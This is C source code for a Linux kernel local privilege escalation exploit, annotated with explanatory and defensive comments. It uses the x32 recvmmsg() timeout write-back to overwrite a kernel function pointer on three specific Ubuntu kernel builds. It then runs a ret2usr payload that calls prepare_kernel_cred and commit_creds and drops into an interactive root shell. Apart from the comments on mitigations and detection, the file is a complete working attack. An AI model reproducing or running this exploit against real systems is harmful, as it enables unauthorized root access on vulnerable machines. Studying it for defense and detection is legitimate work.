  1. #define _GNU_SOURCE
  2. #include <netinet/ip.h>
  3. #include <stdio.h>
  4. #include <stdlib.h>
  5. #include <string.h>
  6. #include <sys/socket.h>
  7. #include <unistd.h>
  8. #include <sys/syscall.h>
  9. #include <sys/mman.h>
  10. #include <sys/types.h>
  11. #include <sys/stat.h>
  12. #include <fcntl.h>
  13. #include <sys/utsname.h>
  14.  
/*
 * Syscall-number override.  0x40000000 is the bit that selects the x32 ABI
 * syscall table on x86-64, and 537 is recvmmsg's number in that table, so the
 * syscall() in main() reaches the x32 compat entry point from a 64-bit
 * process instead of the native recvmmsg.
 *
 * Defensive notes: a kernel built without CONFIG_X86_X32 has no x32 table and
 * is expected to fail this number with ENOSYS; a seccomp filter can reject any
 * syscall number with this bit set (the check man 2 seccomp recommends for
 * processes that have no business using x32).
 */
#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
#define VLEN 1          /* one mmsghdr per recvmmsg() call */
#define BUFSIZE 200     /* receive buffer for the single loopback datagram */

/* Loopback UDP port: chosen at random in main(), read by the udp() helper. */
int port;
  22.  
/*
 * Per-kernel-build address set.  Every numeric field is a fixed kernel
 * virtual address taken from one specific Ubuntu kernel build (see offsets[]),
 * which is why KASLR, or simply a different build, leaves the table useless.
 */
struct offset {
    char *kernel_version;          /* exact uname -r string this row applies to */
    unsigned long dest;            /* net_sysctl_root + 96: kernel address that main() hands
                                      to recvmmsg() as its timeout pointer */
    unsigned long original_value;  /* net_ctl_permissions: the value stored at dest; its low
                                      40 bits choose the fixed user mapping in main() */
    unsigned long prepare_kernel_cred;  /* kernel credential helpers, called from getroot() */
    unsigned long commit_creds;
};
  30.  
/*
 * Hard-coded addresses for three Ubuntu kernel builds; the NULL row terminates
 * the table.  main() compares utsname.release with kernel_version exactly, so
 * any other release string exits before the kernel is touched.  The first row
 * writes dest as base + 96 to mirror the field comment in struct offset; the
 * other rows carry the pre-added value.
 */
struct offset offsets[] = {
    {"3.11.0-15-generic", 0xffffffff81cdf400+96, 0xffffffff816d4ff0, 0xffffffff8108afb0, 0xffffffff8108ace0}, // Ubuntu 13.10
    {"3.11.0-12-generic", 0xffffffff81cdf3a0, 0xffffffff816d32a0, 0xffffffff8108b010, 0xffffffff8108ad40}, // Ubuntu 13.10
    {"3.8.0-19-generic", 0xffffffff81cc7940, 0xffffffff816a7f40, 0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
    {NULL, 0, 0, 0, 0}
};
  37.  
/*
 * Fork a helper that waits 256 one-second ticks, then sends a single datagram
 * to the loopback port so the blocking recvmmsg() in main() returns.  b is the
 * iteration index (0..2) and only feeds the progress message; the parent
 * returns immediately.  The length of the wait is part of the technique (it
 * shapes the timeout value recvmmsg() writes back) — not verified here — and
 * it is why a full run takes roughly 13 minutes.
 *
 * Review notes: socket() and sendto() results are unchecked, and the parent
 * never wait()s, so each helper lingers as a zombie until the process exits.
 * For a defender the timing itself is the tell: a process blocked in
 * recvmmsg() on a bound loopback UDP socket for minutes at a time.
 */
void udp(int b) {
    int sockfd;
    struct sockaddr_in servaddr, cliaddr;   /* cliaddr is never used */
    int s = 0xff+1;                         /* 256 ticks */

    if(fork() == 0) {
        while(s > 0) {
            /* Countdown: total budget is 3*0xff s, minus finished bytes and this byte's elapsed ticks. */
            fprintf(stderr,"\rbyte %d / 3.. ~%d secs left \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
            sleep(1);
            s--;
            fprintf(stderr,".");
        }

        sockfd = socket(AF_INET,SOCK_DGRAM,0);
        bzero(&servaddr,sizeof(servaddr));
        servaddr.sin_family = AF_INET;
        servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
        servaddr.sin_port=htons(port);
        sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
        exit(0);
    }

}
  61.  
/*
 * Exercise the net sysctl path whose permission hook (original_value, per the
 * comment in struct offset) main() has redirected, then check whether the
 * process is now uid 0 and hand over an interactive shell.  getroot() returns
 * -1, so the open() itself is expected to fail; its descriptor, if one is ever
 * returned, is never closed.
 *
 * Detection angle: a process whose uid drops to 0 right after a read-only
 * open() of a /proc/sys path, with no setuid binary or exec in between, is a
 * credential change that no legitimate path produces.
 */
void trigger() {
    open("/proc/sys/net/core/somaxconn",O_RDONLY);

    if(getuid() != 0) {
        fprintf(stderr,"not root, ya blew it!\n");
        exit(-1);
    }

    fprintf(stderr,"w00p w00p!\n");
    system("/bin/sh -i");
}
  73.  
/*
 * Function-pointer types for two kernel credential helpers.  The globals are
 * filled in main() from the offsets[] row for the running kernel and are only
 * ever called from getroot(), i.e. while executing in kernel context.
 * regparm(3) looks like a carry-over from 32-bit payloads; on x86-64 the ABI
 * already passes the first arguments in registers.
 */
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
  78.  
  79. // thx bliss
/*
 * Runs in kernel context once the redirected permission hook is invoked:
 * prepare_kernel_cred(0) builds a root credential and commit_creds() installs
 * it on the current task.  Returning -1 presumably makes the hooked check
 * deny the access so the caller stays on an ordinary error path.  head and
 * table are the hook's own arguments and are unused.
 *
 * This is the classic ret2usr shape — kernel code jumping into a user page.
 * SMEP makes that jump fault instead of executing, and SMAP covers the data
 * accesses; both are standard hardware mitigations for exactly this pattern.
 */
static int __attribute__((regparm(3)))
getroot(void *head, void * table)
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}
  86.  
/*
 * Relocatable stub that main() copies (300 bytes from its start) into the
 * fixed user mapping: it loads getroot's absolute address into %rax and calls
 * it, so the stub works wherever it is copied.  The absolute `mov $getroot`
 * needs a non-PIE link so the symbol fits the 32-bit immediate; under PIE it
 * would be a relocation error.  The 300-byte copy reads past the end of this
 * tiny function into whatever follows it in .text and relies on that being
 * harmless to copy.
 */
void __attribute__((regparm(3)))
trampoline()
{
    asm("mov $getroot, %rax; call *%rax;");
}
  92.  
/*
 * Entry point.  Sequence: pick the offsets[] row for the running kernel, map
 * three RWX pages at a fixed low user address derived from original_value,
 * copy the trampoline into them, bind a loopback UDP socket, then call the
 * x32 recvmmsg() three times with a kernel address as the timeout pointer so
 * the kernel's timeout write-back lands on the function pointer stored at
 * dest.  trigger() finally exercises the redirected hook.
 *
 * What defeats this, for reference: a kernel without CONFIG_X86_X32 (no entry
 * point behind the overridden syscall number); KASLR or any build other than
 * the three listed (a uname mismatch exits early, a wrong address would most
 * likely oops); SMEP, which faults when the kernel jumps into the user RWX
 * mapping.  Observable behaviour for detection: a 64-bit process issuing
 * x32-ABI syscalls, a MAP_FIXED anonymous RWX mapping, and roughly 13 minutes
 * spent blocked in recvmmsg() on a bound loopback UDP port.
 */
int main(void)
{
    int sockfd, retval, i;
    struct sockaddr_in sa;
    struct mmsghdr msgs[VLEN];
    struct iovec iovecs[VLEN];
    char buf[BUFSIZE];
    long mmapped;
    struct utsname u;
    struct offset *off = NULL;

    uname(&u);

    /* Exact match on the release string; nothing fuzzy. */
    for(i=0;offsets[i].kernel_version != NULL;i++) {
        if(!strcmp(offsets[i].kernel_version,u.release)) {
            off = &offsets[i];
            break;
        }
    }

    if(!off) {
        fprintf(stderr,"no offsets for this kernel version..\n");
        exit(-1);
    }

    /*
     * Page-align the kernel pointer value and keep only its low 40 bits: the
     * mask drops exactly the three top bytes the loop below overwrites, so
     * this is the user address the pointer is evidently meant to resolve to
     * afterwards.
     */
    mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));
    mmapped &= 0x000000ffffffffff;

    /* time() is used but <time.h> is not in the include list: implicit declaration. */
    srand(time(NULL));
    port = (rand() % 30000)+1500;

    commit_creds = (_commit_creds)off->commit_creds;
    prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;

    /* Three RWX pages at the computed address; MAP_FIXED silently replaces anything already mapped there. */
    mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);

    if(mmapped == -1) {
        perror("mmap()");
        exit(-1);
    }

    /* 0x90 is x86 NOP: fill all three pages, then place the trampoline in the middle one. */
    memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);

    memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);

    if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
        perror("mprotect()");
        exit(-1);
    }

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
        perror("socket()");
        exit(-1);
    }

    /* sa is not zeroed first, so sin_zero carries stack garbage (bind() ignores it). */
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(port);

    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
        perror("bind()");
        exit(-1);
    }

    memset(msgs, 0, sizeof(msgs));

    iovecs[0].iov_base = &buf;
    iovecs[0].iov_len = BUFSIZE;
    msgs[0].msg_hdr.msg_iov = &iovecs[0];
    msgs[0].msg_hdr.msg_iovlen = 1;

    /*
     * One write per iteration, with the timeout pointer at dest+7, dest+6 and
     * dest+5 — the top three bytes of the little-endian pointer at dest.
     * udp(i) forks the helper whose datagram unblocks the call ~256 s later.
     * Arithmetic on a void * is a GCC extension.  The retval test is off:
     * recvmmsg() returns -1 on error and the message count on success, so only
     * a zero count is reported and a genuine failure (e.g. ENOSYS on a kernel
     * without x32) passes silently.
     */
    for(i=0;i < 3 ;i++) {
        udp(i);
        retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
        if(!retval) {
            fprintf(stderr,"\nrecvmmsg() failed\n");
        }
    }

    close(sockfd);

    fprintf(stderr,"\n");

    trigger();
}